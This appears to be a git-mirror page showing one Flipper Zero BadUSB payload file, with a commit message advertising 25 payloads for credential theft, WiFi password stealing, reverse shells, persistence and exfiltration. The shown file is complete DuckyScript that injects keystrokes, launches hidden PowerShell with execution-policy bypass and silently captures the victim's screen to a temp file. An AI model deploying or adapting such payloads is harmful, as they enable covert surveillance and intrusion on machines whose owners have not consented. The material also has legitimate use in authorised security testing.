mirror of
https://github.com/UberGuidoZ/Flipper.git
synced 2026-09-17 07:13:18 +00:00
4f61dec96b
Added 25 BadUSB payloads for Flipper Zero: - System reconnaissance (Windows/Linux/Mac) - Credential extraction & WiFi password stealing - Reverse shells (PowerShell & Bash) - Defense evasion & persistence - Data exfiltration (keylogger, webcam, clipboard) - Harmless pranks All payloads include proper headers and documentation. Cross-platform support for Windows, Linux, and macOS.
28 lines
759 B
Plaintext
28 lines
759 B
Plaintext
REM ========================================
|
|
REM NullSec Flipper Zero BadUSB
|
|
REM Payload: Screenshot Capture
|
|
REM Target: Windows 10/11
|
|
REM ========================================
|
|
DELAY 1000
|
|
GUI r
|
|
DELAY 500
|
|
STRING powershell -w hidden -ep bypass
|
|
ENTER
|
|
DELAY 500
|
|
STRING Add-Type -AssemblyName System.Windows.Forms
|
|
ENTER
|
|
STRING [Reflection.Assembly]::LoadWithPartialName("System.Drawing") | Out-Null
|
|
ENTER
|
|
STRING $b = [System.Windows.Forms.Screen]::PrimaryScreen.Bounds
|
|
ENTER
|
|
STRING $bmp = New-Object System.Drawing.Bitmap($b.Width,$b.Height)
|
|
ENTER
|
|
STRING $g = [System.Drawing.Graphics]::FromImage($bmp)
|
|
ENTER
|
|
STRING $g.CopyFromScreen($b.Location,[System.Drawing.Point]::Empty,$b.Size)
|
|
ENTER
|
|
STRING $bmp.Save("$env:TEMP\screenshot.png")
|
|
ENTER
|
|
STRING exit
|
|
ENTER
|